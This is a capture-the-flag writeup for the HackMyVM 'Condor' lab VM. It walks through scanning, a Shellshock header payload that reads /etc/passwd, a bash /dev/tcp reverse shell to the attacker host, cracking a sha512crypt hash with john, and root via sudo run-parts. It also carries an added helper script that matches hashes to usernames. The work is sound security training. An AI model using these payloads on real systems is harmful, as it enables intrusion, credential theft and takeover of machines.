HackMyVM - Condor - Writeup
https://hackmyvm.eu/machines/machine.php?vm=Condor
Find it
└─$ sudo netdiscover -r 10.0.0.0/24 -P 255
[sudo] password for kali:
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.0.1 08:00:27:1f:ab:fd 1 60 PCS Systemtechnik GmbH
10.0.0.37 08:00:27:12:4f:50 1 60 PCS Systemtechnik GmbH
-- Active scan completed, 2 Hosts found.
Scan it
└─$ nmap -T4 -sC -sV -oN nmap.out 10.0.0.37
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-14 17:34 EST
Nmap scan report for 10.0.0.37
Host is up (0.00045s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 39:41:db:3a:f0:8f:7d:4d:85:c5:aa:0b:5f:66:ba:a7 (RSA)
| 256 66:89:b1:8e:8b:af:cf:7f:49:c5:7c:e6:4b:b7:d8:5b (ECDSA)
|_ 256 a3:b3:f0:14:a4:4e:05:c0:d1:24:2f:a8:fe:a5:2c:eb (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.44 seconds
Two ports are open, SSH and HTTP. SSH accepts only public-key authentication, so there is nothing to guess there and the web server is the way in:
└─$ ssh 10.0.0.37
kali@10.0.0.37: Permission denied (publickey).
Enumerate webserver
└─$ nikto -h http://10.0.0.37
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.0.0.37
+ Target Hostname: 10.0.0.37
+ Target Port: 80
+ Start Time: 2021-11-14 17:38:54 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.51 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
+ 8699 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2021-11-14 17:39:57 (GMT-5) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto flagged /cgi-bin/test.cgi. Brute-force the web root first, then give /cgi-bin/ its own scan with script-style extensions (cgi, sh, pl, py), since CGI scripts are the interesting targets there.
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.37/ -x html,php,txt,jpg -o dir-medium.txt --no-error
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.0.37/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: html,php,txt,jpg
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2021/11/14 17:43:26 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 183]
/mitnick.jpg (Status: 200) [Size: 40961]
/server-status (Status: 403) [Size: 274]
===============================================================
2021/11/14 17:48:56 Finished
===============================================================
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.37/cgi-bin/ -x cgi,bash,sh,pl,py -o dir-medium.txt --no-error
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.0.37/cgi-bin/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sh,pl,py,cgi,bash
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2021/11/14 17:52:59 Starting gobuster in directory enumeration mode
===============================================================
/test.cgi (Status: 200) [Size: 20]
/condor.sh (Status: 200) [Size: 137]
condor.sh is served through Apache's CGI handler. Sending a request header whose value starts with "() { :; };" tests for Shellshock (CVE-2014-6271): Apache exports every request header into the CGI environment as HTTP_<NAME>, and an unpatched bash, while importing that value as a function definition, goes on to execute the command that follows the closing brace. The header name does not matter (a made-up one, "custom", is used here). The two echo calls emit a minimal CGI header block so Apache returns the command output instead of a 500 "malformed header" error, and the absolute path to cat avoids relying on whatever PATH the CGI environment has:
┌──(kali㉿kali)-[~/condor]
└─$ curl http://10.0.0.37/cgi-bin/condor.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
kevin:x:1000:1000:,,,:/home/kevin:/bin/bash
paulo:x:1001:1001:,,,:/home/paulo:/bin/bash
Getting a shell
After a little trial and error I ended up getting a reverse shell.
https://ethicalhackingguru.com/how-to-exploit-the-shellshock-vulnerability/
The same trick through the User-Agent header gives a reverse shell. Start the netcat listener on the attacking host (10.0.0.10) before sending the request; the request blocks for as long as the shell stays open, so curl will appear to hang:
┌──(kali㉿kali)-[~/condor]
└─$ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.10/1234 0>&1' http://10.0.0.37/cgi-bin/condor.sh
┌──(kali㉿kali)-[~/condor]
└─$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.0.0.10] from (UNKNOWN) [10.0.0.37] 42036
bash: cannot set terminal process group (423): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-4.3$
Escalating to User
A hidden file in kevin's home directory (the working directory when su is run below) holds five lines of paired hashes:
└─$ cat .i_did_it_again
8395d26f20d997f971919e93edee06d3:$6$TCX.c/9ARPR3KCFE$4ZhsWox9dPa8/CG4O6socHVYYM6cJbtpaBx9cefvABC8gP0vMrWsgBhUUGoAHWnJI.X.NyzP5sbtMpGGfwuS11
307dcfe346e38992d47000630bd19579:$6$gwBgUJgQHGxTex13$b/67Oe7CIvDS85hex4GrHC2RuEkLRfWHAAgimHNyxC/L5biEqSly920uazvDXx3ACrM.srme6Us78aWUEGNAG0
c34040783efce8ebedb253e854c79569:$6$WAq1h/mdGSMb9QVv$aN54cSdOf3TEsGZt94op0s9hDGWwEusVLi8PtfMmzmOl3AMNGgBMJqQaRHxPrpSFJTLB2T.vFnbYKv6eQpzUT1
0edc0358ba098a665397f277d9caa307:$6$n5AKhYSQNaywXCs0$k5X7gxoiRh/rfcUVxLHmFlhINTxnsJrqCPRCQYdKmn8UWtn2.yF8J.zqTrx3q8YdnDbdpzZvKNtK4ZqteGDEO.
dd41cb18c930753cbecf993f828603dc:$6$1tKf9R.0qo7v5DjD$uYneSfO1bb4upW2xlLw.hHGeuAtCunYhdOjQS2MBdnpPcMt0ZiZee42BjDO2jmUJffTXsKdo43SjE4pqM6WqJ/
Each line is two hashes separated by a colon: a 32-hex-digit MD5 on the left and a crypt(3) SHA-512 hash on the right ($6$ is the /etc/shadow format). The MD5 looks like a hashed username, and hashing "paulo" without a trailing newline (hence echo -n) matches the last line:
┌──(kali㉿kali)-[~]
└─$ echo -n paulo|md5sum
dd41cb18c930753cbecf993f828603dc -
Save that line on its own and run john against it. John treats the MD5 field as the "username" and reports the cracked password next to it:
┌──(kali㉿kali)-[~/condor]
└─$ cat paulohash
dd41cb18c930753cbecf993f828603dc:$6$1tKf9R.0qo7v5DjD$uYneSfO1bb4upW2xlLw.hHGeuAtCunYhdOjQS2MBdnpPcMt0ZiZee42BjDO2jmUJffTXsKdo43SjE4pqM6WqJ/
┌──(kali㉿kali)-[~/condor]
└─$ john --wordlist=/home/kali/rockyou.txt paulohash
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
p*********3 (dd41cb18c930753cbecf993f828603dc)
1g 0:00:00:00 DONE (2021-11-15 00:37) 1.219g/s 1873p/s 1873c/s 1873C/s cuties..mexico1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
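The username-to-hash matching done by hand above (echo -n paulo | md5sum, then picking the line), generalised to every login-capable account in /etc/passwd and written out as a john-ready "user:hash" file. This is an added example, not code from the writeup; the function names are hypothetical and the sample data is constructed from the values the writeup shows.

```shell
#!/bin/sh
# Added example, not part of the original writeup: map the lines of
# .i_did_it_again ("md5(username):sha512crypt") back to usernames so the
# right hash can be handed to john as "user:hash". Candidate usernames come
# from a passwd-format file. Function names are hypothetical; the sample
# data below is constructed from the values shown in the writeup.

# MD5 hex digest of a string with no trailing newline (the same as
# "echo -n paulo | md5sum"; an accidental newline changes the digest).
md5_of() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# Print the usernames whose login shell ends in "sh" (bash, sh, zsh, ...),
# which skips nologin, false and sync accounts. $1: passwd-format file.
usernames_from_passwd() {
    awk -F: '$7 ~ /sh$/ { print $1 }' "$1"
}

# For each candidate username, look for md5(username) in the first field of
# the hash file and print "username:hash" for every match.
# $1: hash file, $2: file with one candidate username per line.
resolve_hashes() {
    while IFS= read -r user; do
        [ -n "$user" ] || continue
        digest=$(md5_of "$user")
        grep -F "${digest}:" "$1" | sed "s/^${digest}:/${user}:/"
    done < "$2"
}

# Demo on constructed input: the five lines from the writeup's file and a
# trimmed passwd with the interactive accounts from the writeup's /etc/passwd.
demo() {
    dir=$(mktemp -d)
    cat > "$dir/hashes" <<'EOF'
8395d26f20d997f971919e93edee06d3:$6$TCX.c/9ARPR3KCFE$4ZhsWox9dPa8/CG4O6socHVYYM6cJbtpaBx9cefvABC8gP0vMrWsgBhUUGoAHWnJI.X.NyzP5sbtMpGGfwuS11
307dcfe346e38992d47000630bd19579:$6$gwBgUJgQHGxTex13$b/67Oe7CIvDS85hex4GrHC2RuEkLRfWHAAgimHNyxC/L5biEqSly920uazvDXx3ACrM.srme6Us78aWUEGNAG0
c34040783efce8ebedb253e854c79569:$6$WAq1h/mdGSMb9QVv$aN54cSdOf3TEsGZt94op0s9hDGWwEusVLi8PtfMmzmOl3AMNGgBMJqQaRHxPrpSFJTLB2T.vFnbYKv6eQpzUT1
0edc0358ba098a665397f277d9caa307:$6$n5AKhYSQNaywXCs0$k5X7gxoiRh/rfcUVxLHmFlhINTxnsJrqCPRCQYdKmn8UWtn2.yF8J.zqTrx3q8YdnDbdpzZvKNtK4ZqteGDEO.
dd41cb18c930753cbecf993f828603dc:$6$1tKf9R.0qo7v5DjD$uYneSfO1bb4upW2xlLw.hHGeuAtCunYhdOjQS2MBdnpPcMt0ZiZee42BjDO2jmUJffTXsKdo43SjE4pqM6WqJ/
EOF
    cat > "$dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
kevin:x:1000:1000:,,,:/home/kevin:/bin/bash
paulo:x:1001:1001:,,,:/home/paulo:/bin/bash
EOF
    usernames_from_passwd "$dir/passwd" > "$dir/users"
    resolve_hashes "$dir/hashes" "$dir/users" > "$dir/john.txt"
    cat "$dir/john.txt"
    echo "# next: john --wordlist=rockyou.txt $dir/john.txt"
}

demo
```

Giving john a real username in the first field (rather than the MD5) makes --show output readable and lets the cracked credential be used directly with su or ssh.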
The reverse shell runs as www-data, so switch to paulo with the cracked password:
bash-4.3$ su paulo
su paulo
Password: p*********3
paulo@condor:/home/kevin$ cd
cd
paulo@condor:~$ ls
ls
user.txt
Escalating to root
https://gtfobins.github.io/gtfobins/run-parts/#sudo
paulo@condor:~$ sudo -l
sudo -l
Matching Defaults entries for paulo on condor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User paulo may run the following commands on condor:
(ALL : ALL) NOPASSWD: /usr/bin/run-parts
run-parts executes every file in a directory whose name matches --regex, and under sudo it does so as root. Pointing it at /bin with a regex that matches only "sh" therefore runs /bin/sh as root; --new-session just runs the script in its own process session. Preview the match without executing anything with "sudo run-parts --list --regex '^sh$' /bin", then drop --list:
paulo@condor:~$ sudo run-parts --new-session --regex '^sh$' /bin
sudo run-parts --new-session --regex '^sh$' /bin
/bin/sh: 0: can't access tty; job control turned off
# id
id
uid=0(root) gid=0(root) groups=0(root)
#